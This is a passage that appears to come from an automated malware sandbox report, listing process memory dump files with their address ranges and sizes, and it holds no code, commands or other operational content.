                      • memory/2880-258-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/2880-256-0x000000000043FCC3-mapping.dmp
                      • memory/2880-255-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/2888-160-0x0000000000000000-mapping.dmp
                      • memory/2940-168-0x000000000043FCC3-mapping.dmp
                      • memory/2944-487-0x0000000000160000-0x0000000000161000-memory.dmp
                        Filesize

                        4KB

                      • memory/2944-495-0x0000000001E90000-0x0000000001EA2000-memory.dmp
                        Filesize

                        72KB

                      • memory/2944-492-0x0000000001DF0000-0x0000000001DF1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2944-477-0x0000000000000000-mapping.dmp
                      • memory/2944-509-0x0000000001F40000-0x0000000001F45000-memory.dmp
                        Filesize

                        20KB

                      • memory/2944-511-0x00000000004A0000-0x00000000004B0000-memory.dmp
                        Filesize

                        64KB

                      • memory/2944-516-0x0000000004AA0000-0x0000000004AA2000-memory.dmp
                        Filesize

                        8KB

                      • memory/2944-481-0x00000000725C0000-0x0000000072CAE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2996-470-0x00000000725C0000-0x0000000072CAE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2996-471-0x0000000000D10000-0x0000000000D11000-memory.dmp
                        Filesize

                        4KB

                      • memory/2996-518-0x0000000000AA0000-0x0000000000AC3000-memory.dmp
                        Filesize

                        140KB

                      • memory/2996-520-0x0000000000AD0000-0x0000000000AF4000-memory.dmp
                        Filesize

                        144KB

                      • memory/2996-467-0x0000000000000000-mapping.dmp